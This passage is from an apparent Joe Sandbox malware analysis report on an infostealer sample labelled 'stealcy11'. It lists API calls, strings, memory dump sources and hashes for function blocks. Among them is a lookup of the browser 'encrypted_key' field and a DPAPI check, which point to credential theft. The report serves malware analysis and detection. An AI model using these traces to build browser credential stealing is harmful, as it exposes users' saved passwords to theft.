                                  • Instruction Fuzzy Hash: 5B415D717047469BEB20CFAADC84BAAB3E8FF89315F144569ED5EC7300E631E9108B50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 008E9D08
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 008E9D3A
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008E9D63
                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 008E9D9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpymemcmp
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 4154055062-738592651
                                  • Opcode ID: cf714cba7f1881cb3ced06acaf857bd85199f2c99d071d06020312c083f1c661
                                  • Instruction ID: 931d5c082ed6783e604003bb51bc7ca161c71a1a008eed8bbccbd1cab87827b8
                                  • Opcode Fuzzy Hash: cf714cba7f1881cb3ced06acaf857bd85199f2c99d071d06020312c083f1c661
                                  • Instruction Fuzzy Hash: 85419C71E002A99BDB11EF6ACC81AAE7BB8FF42300F044065E994E7352DAB0ED05C791
                                  APIs
                                  • strtok_s.MSVCRT ref: 008F7F84
                                  • lstrlenA.KERNEL32(00000000), ref: 008F7FB1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F7FE0
                                  • strtok_s.MSVCRT ref: 008F7FF1
                                  • StrCmpCA.SHLWAPI(00000000,009151F4), ref: 008F8025
                                  • StrCmpCA.SHLWAPI(00000000,009151F4), ref: 008F8053
                                  • StrCmpCA.SHLWAPI(00000000,009151F4), ref: 008F8087
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s$lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 348468850-0
                                  • Opcode ID: 05afbb27e1ac7e54b3eefe07839a16dc890b98e4ad4b3f4096fa70e26fe2e470
                                  • Instruction ID: 87508a65de20b5c0d45111201199651acac6aea0bd33c0f25576f147e4831e54
                                  • Opcode Fuzzy Hash: 05afbb27e1ac7e54b3eefe07839a16dc890b98e4ad4b3f4096fa70e26fe2e470
                                  • Instruction Fuzzy Hash: C2418D34A0451EDFDB20DF28D884EAE77B4FF85304B114099E905DB251EF71EA66CB91
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7DD8
                                    • Part of subcall function 0090A1F0: std::exception::exception.LIBCMT ref: 0090A205
                                    • Part of subcall function 0090A1F0: __CxxThrowException@8.LIBCMT ref: 0090A21A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7DF6
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7E11
                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,008F7CFA,00000000,?,?,00000000,?,008E91B6,?), ref: 008F7E74
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 702443124-4289949731
                                  • Opcode ID: b3728a79a2337007b848087e94f17e98cadd0fc80f971aecd4ae7ec68bf1926a
                                  • Instruction ID: 889cf57c3270e6de45b6064e87d8a5bd6a6bea97825ff34fac18a7548845e585
                                  • Opcode Fuzzy Hash: b3728a79a2337007b848087e94f17e98cadd0fc80f971aecd4ae7ec68bf1926a
                                  • Instruction Fuzzy Hash: C02184323087088FE724DE7CD880A3AB7A5FF95B14B604A6EE556CB641D7619C4087A1
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,008E12EE), ref: 008E9AFA
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,008E12EE), ref: 008E9B10
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,008E12EE), ref: 008E9B27
                                  • ReadFile.KERNEL32(00000000,00000000,?,008E12EE,00000000,?,?,?,008E12EE), ref: 008E9B40
                                  • LocalFree.KERNEL32(?,?,?,?,008E12EE), ref: 008E9B60
                                  • CloseHandle.KERNEL32(00000000,?,?,?,008E12EE), ref: 008E9B67
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 958b8bc536ecb37bef67ea639ae3e70dc6619fd3380a9725c06bb30acfeee7cb
                                  • Instruction ID: d67bd1e9946b03749aa18229e3f17c3ec1e06e5af2878af3357aaa30540f02a6
                                  • Opcode Fuzzy Hash: 958b8bc536ecb37bef67ea639ae3e70dc6619fd3380a9725c06bb30acfeee7cb
                                  • Instruction Fuzzy Hash: 96118EB0600259AFE710DFA6EC88EBA736CFB45710F104119F914D7280EB70AD00CB64
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E89C6
                                    • Part of subcall function 0090A1F0: std::exception::exception.LIBCMT ref: 0090A205
                                    • Part of subcall function 0090A1F0: __CxxThrowException@8.LIBCMT ref: 0090A21A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E89FD
                                    • Part of subcall function 0090A1A3: std::exception::exception.LIBCMT ref: 0090A1B8
                                    • Part of subcall function 0090A1A3: __CxxThrowException@8.LIBCMT ref: 0090A1CD
                                  • memcpy.MSVCRT(?,00000000,?,00000000,?,?,008E8800,?,00000000,008E77D7), ref: 008E8A5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2202983795-4289949731
                                  • Opcode ID: e31aa8246c6b38babc596043fd64b10a5c1377622b9aa3788f2c5cc189756a0b
                                  • Instruction ID: d2def972218f6033161da0b3dcd2b588833ae16d0c989b7e189b12342c82f8b6
                                  • Opcode Fuzzy Hash: e31aa8246c6b38babc596043fd64b10a5c1377622b9aa3788f2c5cc189756a0b
                                  • Instruction Fuzzy Hash: B321D872300694CBC720DA5DE840A6EF795FBA2761B11093FF159CB291DA71D841C3E6
                                  APIs
                                  • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00901E28), ref: 00901B52
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,0090D014), ref: 0090182F
                                    • Part of subcall function 00901800: lstrlenA.KERNEL32(010BFA80,00000000,00000000,?,?,00901B61), ref: 00901840
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,00000000), ref: 00901867
                                    • Part of subcall function 00901800: lstrcatA.KERNEL32(00000000,00000000), ref: 00901872
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,00000000), ref: 009018A1
                                    • Part of subcall function 00901800: lstrlenA.KERNEL32(00915558,?,?,00901B61), ref: 009018B3
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,00000000), ref: 009018D4
                                    • Part of subcall function 00901800: lstrcatA.KERNEL32(00000000,00915558,?,?,00901B61), ref: 009018E0
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,00000000), ref: 0090190F
                                  • sscanf.NTDLL ref: 00901B7A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00901B96
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00901BA6
                                  • ExitProcess.KERNEL32 ref: 00901BC3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: 615fb037f5ec2a98e993e1c9532df58908440b03ef6fc55366767f12f186adb5
                                  • Instruction ID: 5ef840614413e6ca68e4e608549bb8a15d19570fc3da7345c1f54ede05aa4221
                                  • Opcode Fuzzy Hash: 615fb037f5ec2a98e993e1c9532df58908440b03ef6fc55366767f12f186adb5
                                  • Instruction Fuzzy Hash: 0721E4B1518341AF8340DF69D88489BBBF8EFC8314F408A1EF599C3264EB70D5048BA2
                                  APIs
                                  • memcpy.MSVCRT(?,?,00000040), ref: 008E6E40
                                  • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 008E6E7C
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 008E6EB4
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E6EBB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heapmemcpy$AllocProcess
                                  • String ID: @
                                  • API String ID: 1643994569-2766056989
                                  • Opcode ID: c35dcf59946e3184cef6cadcc4a420f7086280c27e6533f70ac7de3c930cad9d
                                  • Instruction ID: fdcf7a4e4bab5ac3a8cc7c27c7a3f80c28fa4abc9538933481b1a917e29d0abc
                                  • Opcode Fuzzy Hash: c35dcf59946e3184cef6cadcc4a420f7086280c27e6533f70ac7de3c930cad9d
                                  • Instruction Fuzzy Hash: 6C11AD706006428BDB208B62DC88BBA73F5FB52740F044428EA46CB684FF74E990CB51
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7D14
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7D2F
                                  • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,008E91B6,?,?,?,?,00000000,?,00001000,?), ref: 008F7D84
                                    • Part of subcall function 008F7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008F7DD8
                                    • Part of subcall function 008F7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008F7DF6
                                    • Part of subcall function 008F7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008F7E11
                                    • Part of subcall function 008F7DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,008F7CFA,00000000,?,?,00000000,?,008E91B6,?), ref: 008F7E74
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memcpy
                                  • String ID: string too long
                                  • API String ID: 2304785028-2556327735
                                  • Opcode ID: cd8cd1b588c219db70b17c33b3c68e0e20302f8806420b2122dd362fb5524816
                                  • Instruction ID: 3b679e78c7e705395875c2cbff37856d39f5a21f724a0adc13ba883b7865410a
                                  • Opcode Fuzzy Hash: cd8cd1b588c219db70b17c33b3c68e0e20302f8806420b2122dd362fb5524816
                                  • Instruction Fuzzy Hash: F33107723086088FF724AE7CE880A7AF3E9FF91350760462AF251CB649C771984083A4
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E88B3
                                    • Part of subcall function 0090A1A3: std::exception::exception.LIBCMT ref: 0090A1B8
                                    • Part of subcall function 0090A1A3: __CxxThrowException@8.LIBCMT ref: 0090A1CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
